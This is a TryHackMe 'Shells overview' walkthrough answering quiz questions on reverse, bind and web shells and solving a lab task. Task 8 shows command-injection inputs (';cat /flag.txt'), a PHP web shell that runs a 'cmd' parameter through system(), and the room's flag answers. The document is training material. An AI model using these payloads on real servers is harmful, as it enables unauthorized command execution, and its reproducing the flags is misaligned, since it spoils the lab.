=

Shells overview - TryHackMe writeup

Task 1 - Room Introduction

^

Q1. Click to complete the task.

No Answer Needed

Task 2 - Shell Overview

^

Q1. What is the command-line interface that allows users to interact with an operating system?

shell

Answer šŸ‘‰ Shell

Q2. What process involves using a compromised system as a launching pad to attack other machines in the network?

pivoting

Answer šŸ‘‰ Pivoting

Q3. What is a common activity attackers perform after obtaining shell access to escalate their privileges?

privilege escalation

Answer šŸ‘‰ Privilege Escalation

Task 3 - Reverse Shell

^

Q1. What type of shell allows an attacker to execute commands remotely after the target connects back?

reverse shell

Answer šŸ‘‰ Reverse Shell

Q2. What tool is commonly used to set up a listener for a reverse shell?

netcat

Answer šŸ‘‰ Netcat

Task 4 - Bind Shell

^

Q1. What type of shell opens a specific port on the target for incoming connections from the attacker?

bind shell

Answer šŸ‘‰ Bind Shell

Q2. Listening below which port number requires root access or privileged permissions?

1024

Answer šŸ‘‰ 1024

Task 5 - Shell Listeners

^

Q1. Which flexible networking tool allows you to create a socket connection between two data sources?

socat

Answer šŸ‘‰ socat

Q2. Which command-line utility provides readline-style editing and command history for programs that lack it, enhancing the interaction with a shell listener?

rlwrap

Answer šŸ‘‰ rlwrap

Q3. What is the improved version of Netcat distributed with the Nmap project that offers additional features like SSL support for listening to encrypted shells?

ncat

Answer šŸ‘‰ ncat

Task 6 - Shell Payloads

^

Q1. Which Python module is commonly used for managing shell commands and establishing reverse shell connections in security assessments?

subprocess

Answer šŸ‘‰ subprocess

Q2. What shell payload method in a common scripting language uses the exec, shell_exec, system, passthru, and popen functions to execute commands remotely through a TCP connection?

php

Answer šŸ‘‰ PHP

Q3. Which scripting language can use a reverse shell by exporting environment variables and creating a socket connection?

Answer šŸ‘‰ Python

Task 7 - Web Shell

^

Q1. What vulnerability type allows attackers to upload a malicious script by failing to restrict file types?

Answer šŸ‘‰ Unrestricted File Upload

Q2. What is a malicious script uploaded to a vulnerable web application to gain unauthorized access?

web shell

Answer šŸ‘‰ Web Shell

Task 8 - Practical Task

^
Following informations are given :
  • TARGET_IP:8080 hosts the landing page
  • TARGET_IP:8081 hosts the web application that is vulnerable to command injection.
  • TARGET_IP:8082 hosts the web application that is vulnerable to an unrestricted file upload.

Q1. Using a reverse or bind shell, exploit the command injection vulnerability to get a shell. What is the content of the flag saved in the / directory?

  • Visit on given address TARGET_IP:8081 , a page looks similar like :
    webpage
  • We know that there is a command injection, so let's try the code ;ls / gives following result :
    webpage
  • Use the command ;cat /flag.txt to get the flag.
    flag

Answer šŸ‘‰ THM{0f28b3e1b00becf15d01a1151baf10fd713bc625}

Q2. Using a web shell, exploit the unrestricted file upload vulnerability and get a shell. What is the content of the flag saved in the / directory?

  • Visit on given address TARGET_IP:8082 , a page looks similar having following snippet :
    webpage
  • We know that it is vulnurable to unrestricted file upload, to let's upload a php file. That contains following code :
Code php
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
  • Name it to web.php or whatever you want. And the upload that file. You can see a successfully upload message on top left.
    webpage
  • Normally uploaded files are stored at the directory /upload or /uploads. In our case it is /uploads.
  • Lets execute our php code by visiting it and using our cmd get parameter which we have written in php code for command execution.
  • Final url looks like : TARGET_IP:8082/uploads/web.php?cmd=cat+/flag.txt
final flag

Answer šŸ‘‰ THM{202bb14ed12120b31300cfbbbdd35998786b44e5}

Task 9 - Conclusion

^

Q1. I have successfully completed the room, and I now understand how Reverse Shells, Bind Shells, and Web Shells work!

No Answer Needed